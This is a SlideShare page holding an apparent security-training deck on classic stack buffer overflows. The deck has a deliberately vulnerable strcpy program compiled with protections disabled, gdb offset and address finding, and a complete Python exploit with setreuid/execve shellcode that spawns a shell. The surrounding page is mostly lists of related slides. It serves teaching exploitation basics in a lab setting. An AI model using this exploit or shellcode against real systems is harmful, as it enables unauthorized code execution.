Submit Search
Upload
03 - Refresher on buffer overflow in the old days
•
0 likes
•
827 views
A
Alexandre Moneger
Follow
* Classic BoF exploitation, without any OS mitigations in place * Assumptions and limits
Read less
Read more
Engineering
Report
Share
Report
Share
1 of 15
Recommended
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
Alexandre Moneger
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
Design and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
Linux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
Containers for sysadmins
Containers for sysadmins
Carlos de Alfonso Laguna
Streams for the Web
Streams for the Web
Domenic Denicola
More Related Content
What's hot
Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)
Ontico
Mini CTF workshop dump
Mini CTF workshop dump
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
Debugging Ruby Systems
Debugging Ruby Systems
Engine Yard
Debugging Ruby
Debugging Ruby
Aman Gupta
2016年のPerl (Long version)
2016年のPerl (Long version)
charsbar
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Sheng-Hao Ma
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Svetlana Gaivoronski
32 shell-programming
32 shell-programming
kayalkarnan
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
sanghwan ahn
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
Sheng-Hao Ma
R-House (LSRC)
R-House (LSRC)
Fernand Galiana
Publishing a Perl6 Module
Publishing a Perl6 Module
ast_j
Better detection of what modules are used by some Perl 5 code
Better detection of what modules are used by some Perl 5 code
charsbar
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Do
sanghwan ahn
Alexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for Developers
DevDay Dresden
Feb14 successful development
Feb14 successful development
Connor McDonald
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Anne Nicolas
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
GangSeok Lee
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
sanghwan ahn
What's hot
(20)
Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)
Mini CTF workshop dump
Mini CTF workshop dump
Debugging Ruby Systems
Debugging Ruby Systems
Debugging Ruby
Debugging Ruby
2016年のPerl (Long version)
2016年のPerl (Long version)
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
32 shell-programming
32 shell-programming
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
R-House (LSRC)
R-House (LSRC)
Publishing a Perl6 Module
Publishing a Perl6 Module
Better detection of what modules are used by some Perl 5 code
Better detection of what modules are used by some Perl 5 code
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Do
Alexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for Developers
Feb14 successful development
Feb14 successful development
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
Viewers also liked
Practical rsa padding oracle attacks
Practical rsa padding oracle attacks
Alexandre Moneger
党参
党参
mikejiang
你今天加班了嗎
你今天加班了嗎
Wei-ming Chen
Joel s. goldsmith consciência do único poder
Joel s. goldsmith consciência do único poder
Actor Quantum
CyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab
Plan a Successful Information Management Solution Implementation
Plan a Successful Information Management Solution Implementation
J. Kevin Parker, CIP
Indicadores emprendimiento
Indicadores emprendimiento
nico2754
20161112
20161112
佩琪 羅
資訊安全入門
資訊安全入門
Tyler Chen
Web api scalability and performance
Web api scalability and performance
Himanshu Desai
韩国茶
韩国茶
mikejiang
PCNA Trends 2017
PCNA Trends 2017
Brian O'Gara
Tea making
Tea making
Pasan Bandara
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploits
Alexandre Moneger
Pentesting custom TLS stacks
Pentesting custom TLS stacks
Alexandre Moneger
NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then ice
Alexandre Moneger
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Alexandre Moneger
Web2.0 attack and defence
Web2.0 attack and defence
hackstuff
Research methodology
Research methodology
Rolling Plans Pvt. Ltd.
Viewers also liked
(19)
Practical rsa padding oracle attacks
Practical rsa padding oracle attacks
党参
党参
你今天加班了嗎
你今天加班了嗎
Joel s. goldsmith consciência do único poder
Joel s. goldsmith consciência do único poder
CyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab CCEH Session - 2 Footprinting and Reconnaissance
Plan a Successful Information Management Solution Implementation
Plan a Successful Information Management Solution Implementation
Indicadores emprendimiento
Indicadores emprendimiento
20161112
20161112
資訊安全入門
資訊安全入門
Web api scalability and performance
Web api scalability and performance
韩国茶
韩国茶
PCNA Trends 2017
PCNA Trends 2017
Tea making
Tea making
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploits
Pentesting custom TLS stacks
Pentesting custom TLS stacks
NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then ice
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Web2.0 attack and defence
Web2.0 attack and defence
Research methodology
Research methodology
Similar to 03 - Refresher on buffer overflow in the old days
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
linuxlab_conf
Unix executable buffer overflow
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
Faisal Akber
Airlover 20030324 1
Airlover 20030324 1
Dr.Ravi
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
raccoony
Linux networking
Linux networking
Arie Bregman
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
Patricia Aas
Salesforce at Stacki Atlanta Meetup February 2016
Salesforce at Stacki Atlanta Meetup February 2016
StackIQ
DCEU 18: Tips and Tricks of the Docker Captains
DCEU 18: Tips and Tricks of the Docker Captains
Docker, Inc.
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Matthew Ahrens
Overloading Perl OPs using XS
Overloading Perl OPs using XS
ℕicolas ℝ.
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
CanSecWest
Im trying to run make qemu-nox In a putty terminal but it.pdf
Im trying to run make qemu-nox In a putty terminal but it.pdf
maheshkumar12354
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
Mikhail Sosonkin
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
Susan Potter
Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)
David de Boer
Profiling your Applications using the Linux Perf Tools
Profiling your Applications using the Linux Perf Tools
emBO_Conference
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
Ian Barber
Similar to 03 - Refresher on buffer overflow in the old days
(20)
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
Unix executable buffer overflow
Unix executable buffer overflow
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
Airlover 20030324 1
Airlover 20030324 1
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
Linux networking
Linux networking
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
Salesforce at Stacki Atlanta Meetup February 2016
Salesforce at Stacki Atlanta Meetup February 2016
DCEU 18: Tips and Tricks of the Docker Captains
DCEU 18: Tips and Tricks of the Docker Captains
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Overloading Perl OPs using XS
Overloading Perl OPs using XS
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Im trying to run make qemu-nox In a putty terminal but it.pdf
Im trying to run make qemu-nox In a putty terminal but it.pdf
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)
Profiling your Applications using the Linux Perf Tools
Profiling your Applications using the Linux Perf Tools
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
Recently uploaded
SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....
SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....
santhyamuthu1
Power System electrical and electronics .pptx
Power System electrical and electronics .pptx
MUKULKUMAR210
Gender Bias in Engineer, Honors 203 Project
Gender Bias in Engineer, Honors 203 Project
reemakb03
Guardians and Glitches: Navigating the Duality of Gen AI in AppSec
Guardians and Glitches: Navigating the Duality of Gen AI in AppSec
Trupti Shiralkar, CISSP
計劃趕得上變化
計劃趕得上變化
Jersey (CHE-PING) Su
SUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docx
SUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docx
NaveenVerma126
cme397 surface engineering unit 5 part A questions and answers
cme397 surface engineering unit 5 part A questions and answers
karthi keyan
sdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdf
sdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdf
Julia Kaye
Litature Review: Research Paper work for Engineering
Litature Review: Research Paper work for Engineering
Manipal Institute of Technology Manipal
Phase noise transfer functions.pptx
Phase noise transfer functions.pptx
SaiGouthamSunkara
cloud computing notes for anna university syllabus
cloud computing notes for anna university syllabus
Violet Violet
Design Analysis of Alogorithm 1 ppt 2024.pptx
Design Analysis of Alogorithm 1 ppt 2024.pptx
rajesshs31r
Mohs Scale of Hardness, Hardness Scale.pptx
Mohs Scale of Hardness, Hardness Scale.pptx
KISHAN KUMAR
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
amrabdallah9
Lecture 1: Basics of trigonometry (surveying)
Lecture 1: Basics of trigonometry (surveying)
Bahzad5
Introduction to Machine Learning Unit-3 for II MECH
Introduction to Machine Learning Unit-3 for II MECH
C Sai Kiran
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
DheerajKashnyal
specification estimation and valuation of a building
specification estimation and valuation of a building
swethasekhar5
Présentation IIRB 2024 Chloe Dufrane.pdf
Présentation IIRB 2024 Chloe Dufrane.pdf
Institut Technique de la Betterave
Lecture 2 .pdf
Lecture 2 .pdf
abdnazar2003
Recently uploaded
(20)
SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....
SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....
Power System electrical and electronics .pptx
Power System electrical and electronics .pptx
Gender Bias in Engineer, Honors 203 Project
Gender Bias in Engineer, Honors 203 Project
Guardians and Glitches: Navigating the Duality of Gen AI in AppSec
Guardians and Glitches: Navigating the Duality of Gen AI in AppSec
計劃趕得上變化
計劃趕得上變化
SUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docx
SUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docx
cme397 surface engineering unit 5 part A questions and answers
cme397 surface engineering unit 5 part A questions and answers
sdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdf
sdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdf
Litature Review: Research Paper work for Engineering
Litature Review: Research Paper work for Engineering
Phase noise transfer functions.pptx
Phase noise transfer functions.pptx
cloud computing notes for anna university syllabus
cloud computing notes for anna university syllabus
Design Analysis of Alogorithm 1 ppt 2024.pptx
Design Analysis of Alogorithm 1 ppt 2024.pptx
Mohs Scale of Hardness, Hardness Scale.pptx
Mohs Scale of Hardness, Hardness Scale.pptx
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
Lecture 1: Basics of trigonometry (surveying)
Lecture 1: Basics of trigonometry (surveying)
Introduction to Machine Learning Unit-3 for II MECH
Introduction to Machine Learning Unit-3 for II MECH
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
Oracle_PLSQL_basic_tutorial_with_workon_Exercises.ppt
specification estimation and valuation of a building
specification estimation and valuation of a building
Présentation IIRB 2024 Chloe Dufrane.pdf
Présentation IIRB 2024 Chloe Dufrane.pdf
Lecture 2 .pdf
Lecture 2 .pdf
03 - Refresher on buffer overflow in the old days
1.
Thank you Aleph
One! Refresher on buffer overflow in the old days Alex Moneger Security Engineer
2.
Buffer overflow refresher
First paper by Aleph One in 1996 in Phrack #49: http://www.phrack.org/issues.html?issue=49&id=14 No OS level protections at the time Works by writing past the buffer end aka stuff more data into a buffer then it can hold Goal is to overwrite something interesting control structure with our attacker data. Can de saved EIP, but can be any function pointer © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
3.
Stack refresher (again
;)) Stack holds local variables, the address of the previous frame, the address of where to return to Goal is to overwrite Saved EIP (referred to as SEIP) If we control SEIP, we control where “ret” instruction will go, meaning we control EIP SEIP SEBP Local function storage © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 3
4.
The “classic” cisco@kali:~/src/seccon/ch3$
pygmentize -g ch3.c #include <string.h> int vuln(char *stuff) { char buf[0x64] = {0}; strcpy(buf, stuff); return 1; } int main(int argc, char **argv) { vuln(argv[1]); return 0; } “Buf” has no boundary checking. “stuff” is attacker controlled SEIP SEBP Buf © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 4
5.
Making it exploitable
Previous program compiled with following options: cisco@kali:~/src/seccon/ch3$ sudo sysctl -a | grep randomize kernel.randomize_va_space = 0 cisco@kali:~/src/seccon/ch3$ cc ch3.c -fno-stack-protector -z execstack -U_FORTIFY_SOURCE –g -o ch3 See how many security features we are disabling? Pretend we don’t have sources, find the size of the local stack storage in function prologue cisco@kali:~/src/seccon/ch3$ objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 10 | grep --color esp 804841d: 89 e5 mov ebp,esp 8048421: 83 c4 80 add esp,0xffffff80 cisco@kali:~/src/seccon/ch3$ python -c 'import exutil as e; print e.cmp2(0xffffff80)' -128 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 5
6.
Recon Local
storage for func is 128 bytes. Nothing says that our vulnerable buf starts at the beginning of that Let’s figure out how much we need to overwrite to control EIP Max overwrite size = ebp – esp + SEBP + SEIP = 128 + 4 + 4 = 136 SEIP SEBP ???? Buf ???? 1 2 8 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 6
7.
Finding the offsets
manually cisco@kali:~/src/seccon/ch3$ python -c 'print "A =>", hex(ord("A")), "B =>", hex(ord("B"))' A => 0x41 B => 0x42 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*132+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*128+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613642.976497] ch3[18318]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*124+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613663.605595] ch3[18325]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ # Continue decrementing by 4 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*112+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14 Doing this properly => Use msf pattern_create.rb & pattern_offset.rb © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 7
8.
We’re going to
overflow!!! 1. Choose a shellcode 2. Compute it’s length: ie: 40 bytes 3. Add the proper padding to overwrite SEIP: 112 - 40 = 72 4. Find the address of our shellcode 5. Append to the buffer to redirect flow Shellcode Junk SC Add ress © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 8
9.
Finding buffer address
cisco@kali:~/src/seccon/ch3$ env -i gdb --quiet --args ./ch3 $(python -c 'print "A"*112+"BCDE"') Reading symbols from /home/cisco/src/seccon/ch3/ch3...done. gdb$ gdb$ !objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 22 | tail -n 5 804844e: 83 ec 80 sub esp,0xffffff80 8048451: 5b pop ebx 8048452: 5f pop edi 8048453: 5d pop ebp 8048454: c3 ret gdb$ gdb$ break *0x804844e Breakpoint 1 at 0x804844e: file ch3.c, line 9. gdb$ r gdb$ x/16w $esp 0xbffffc70: 0xbffffc8c 0xbffffec9 0xb7ffeff4 0xbffffd70 0xbffffc80: 0xb7fffac0 0xbffffd44 0xb7feb662 0x41414141 0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffca0: 0x41414141 0x41414141 0x41414141 0x41414141 gdb$ x/x 0xbffffc8c 0xbffffc8c: 0x41414141 gdb$ x/s 0xbffffc8c 0xbffffc8c: 'A' <repeats 112 times>, "BBBB" gdb$ x/2w $ebp 0xbffffcf8: 0x41414141 0x42424242 gdb$ si 5 --------------------------------------------------------------------------[regs] EAX: 00000001 EBX: 41414141 ECX: 00000000 EDX: 00000075 o d I t S z a P C ESI: 00000000 EDI: 41414141 EBP: 41414141 ESP: BFFFFD00 EIP: 42424242 CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop: Cannot access memory at address 0x42424242 0x42424242 in ?? () © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
10.
Summary We
have the overflow length: 116 bytes (112 bytes + 4 bytes SEIP overwrite) We have the buffer’s address (0xbffffc8c) We have a shellcode (I’m a nice guy) Stuff all of it together © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 10
11.
Shell time cisco@kali:~/src/seccon/ch3$
pygmentize ch3.py #!/usr/bin/env python # -*- coding: utf-8 -*- import os import struct target = "ch3" overflow_len = 112 ret_addr = 0xbffffc8c target_path = os.path.abspath(target) # setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0) sc = ("x6ax31x58x99xcdx80x89xc3x89xc1x6ax46" "x58xcdx80xb0x0bx52x68x6ex2fx73x68x68" "x2fx2fx62x69x89xe3x89xd1xcdx80") nop_sled = overflow_len - len(sc) sc_addr = struct.pack("<I", ret_addr) ex = "%s%s%s" % (sc, 'A'*nop_sled, sc_addr) os.execve(target_path, (target_path, ex), os.environ) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 11
12.
Result cisco@kali:~/src/seccon/ch3$ invoke
ch3.py $ id uid=1000(cisco) gid=1001(cisco) groups=1001(cisco) $ exit cisco@kali:~/src/seccon/ch3$ © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 12
13.
Variations Small
buffers (shellcode doesn’t fit): append shellcode after ret address SC Add ress Junk Shellcode Unpredictable buffer address (stack size is not under control): append NOP sled in front of shellcode: NOP sled Shellcode SC Add ress Use an environment variable to host your shellcode © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 13
14.
Limitations Shellcode
on executed on the stack, so stack needs to be executable Buffer address is known, so addresses can’t be randomized Stack frame is not protected (more on this later) There are no null bytes in our buffer address (This can fixed easily) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 14
15.
Now get to
work Compile and exploit ch3 Try any different exploitation technique described previously Don’t use the “invoke” script when trying to exploit. What is happening to the stack? Why is your exploit failing? Enable one memory protection (whichever). Check the effect on the exploit © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 15